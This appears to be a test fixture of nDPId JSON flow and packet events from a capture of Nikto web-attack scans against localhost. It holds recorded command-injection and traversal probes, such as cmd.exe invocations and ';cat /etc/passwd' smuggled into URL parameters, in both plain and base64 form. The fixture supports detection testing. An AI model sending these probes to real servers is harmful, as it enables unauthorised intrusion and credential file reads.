+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} +01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} 
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 